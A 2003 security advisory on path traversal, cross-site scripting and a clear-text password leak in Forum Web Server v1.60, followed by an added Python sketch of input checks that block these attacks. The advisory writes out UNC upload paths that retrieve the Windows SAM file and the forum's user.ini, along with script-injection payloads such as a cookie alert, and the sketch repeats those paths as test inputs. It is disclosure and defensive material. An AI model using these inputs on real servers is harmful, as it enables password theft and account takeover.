fws160.txt

07 Mar 2003 | Reported by Dennis Rand | Type: packetstorm | Source: packetstormsecurity.com

Multiple vulnerabilities in Forum Web Server v1.60 allow unauthorized access and data leaks.

Code
` Multiple vulnerabilities  
found in Forum Web Server v1.60  
http://www.minihttpserver.net  
  
Discovered by Dennis Rand  
www.Infowarfare.dk  
------------------------------------------------------------------------  
  
  
SUMMARY  
WebForums Server allows you to set up a bulletin board and photo/file  
exchange web service. It offers a built-in HTTP engine, internal database  
engine, integrated HTML/Script pages, user management interface, message  
board engine and a secure file Upload/Download option. It is without a doubt  
the easiest and most complete all-in-one Forum Server software you have seen.  
  
First, it is possible to get access to server files outside the restricted  
area of the server, and make sensitive files public.  
Second, there is an XSS vulnerability in the Forum area.  
Third, it is possible to steal the usernames and passwords.  
  
DETAILS  
  
Vulnerable systems:  
Windows NT 4.0 and Windows 2000 server fully patched  
* Forum Web Server v.1.60  
  
Immune systems:  
* Forum Web Server v.1.61  
  
A command request allows remote users to break out of restricted  
directories and gain read access to the system directory structure,  
making it possible to get files from outside restricted areas.  
The server is also vulnerable to XSS and, last but not least,  
I've discovered an information leak to get the user database  
for the Forum Web Server.  
  
  
The following transcript demonstrates a sample exploitation of the   
vulnerabilities:  
-------------------------------------------------------------------  
Traversal:  
Within the FileSharing area, press the "Upload new file" button.  
Then, in the upload field, insert:  
  
\\<vuln host>\c$\winnt\repair\sam._  
  
The file will now be uploaded to an area where you can get the sam._  
and then use e.g. L0pht Crack for breaking the password.  
  
XSS:  
When posting or replying to a message in the "Message Forum", both the  
Subject and the Message fields are vulnerable to XSS.  
  
E.g. insert any of these into either Subject or Message:  
<script>alert('I OwN You');</script>  
<img%20src=javascript:alert(document.domain)>  
<script>alert(document.cookie)</script>  
<script>window.open('http://www.infowarfare.dk')</script>  
  
Information leak:  
Using the Traversal exploit, it is possible to get the usernames and  
passwords from the Forum Web Server  
simply by "uploading" \\<vuln-host>\c$\program Files\web froums server\user.ini  
The usernames and passwords are in clear text, ready to use.  
--------------------------------------------------------------------  
  
Detection:  
Forum Web Server is vulnerable to the above-described attacks.   
Earlier versions may be susceptible as well. To determine if a specific   
implementation is vulnerable, experiment by following the above   
transcript.   
  
Vendor response:  
Received first reply from David Yuan (Master@minihttpserver)  
We thank you for the information and will fix this issue as soon as possible.  
  
  
  
Disclosure timeline:  
--------------------  
21/02/2003 Found the Vulnerability.  
21/02/2003 Reported to Vendor ([email protected] and   
[email protected])  
21/02/2003 Vendor reply, they now know of the vulnerabilities  
04/03/2003 Fix made public  
06/03/2003 Public Disclosure.  
  
  
ADDITIONAL INFORMATION  
The vulnerability was discovered by Dennis Rand  
  
DISCLAIMER:   
The information in this bulletin is provided "AS IS" without warranty of any   
kind. In no event shall we be liable for any damages whatsoever including   
direct, indirect, incidental, consequential, loss of business profits or   
special damages.   
  
  
  
  
  
`
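
Added example (not part of the original advisory and not the vendor's code): a sketch of the two server-side checks that close the upload-field and forum-field issues described above. The function names, the HTML shape and the host name `vulnhost` are assumptions made for illustration.

```python
import html
from pathlib import PureWindowsPath

class RejectedUpload(ValueError):
    """The client-supplied upload field is not a bare file name."""

RESERVED = set('<>:"|?*')  # characters not allowed in a Windows file name

def safe_upload_name(client_name: str) -> str:
    """Return a bare file name or raise RejectedUpload.

    The handler must store the bytes received in the request body under this
    name; it must never open client_name on the server's own file system.
    """
    name = client_name.strip()
    p = PureWindowsPath(name)
    # .drive is "C:" for drive paths and "\\host\share" for UNC paths.
    if p.drive or p.root:
        raise RejectedUpload("absolute or UNC path in upload field")
    if len(p.parts) != 1 or p.name in ("", ".", ".."):
        raise RejectedUpload("path separators or dot segments in upload field")
    if RESERVED & set(p.name):
        raise RejectedUpload("reserved character in file name")
    return p.name

def render_post(subject: str, message: str) -> str:
    """Render a forum post with both user-controlled fields HTML-escaped."""
    return "<h3>{}</h3>\n<p>{}</p>".format(
        html.escape(subject, quote=True), html.escape(message, quote=True))

# Constructed sample inputs, modelled on the values quoted in the advisory.
SAMPLE_UPLOAD_FIELDS = [
    "holiday.jpg",
    r"\\vulnhost\c$\winnt\repair\sam._",
    r"\\vulnhost\c$\program Files\web froums server\user.ini",
    r"..\..\boot.ini",
]

if __name__ == "__main__":
    for field in SAMPLE_UPLOAD_FIELDS:
        try:
            print("accept", safe_upload_name(field))
        except RejectedUpload as err:
            print("reject", repr(field), "-", err)
    print(render_post("<script>alert(document.cookie)</script>", "hello"))
```

The third issue, clear-text credentials in user.ini, is not addressed by input checks; it requires storing salted password hashes instead of the passwords themselves.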
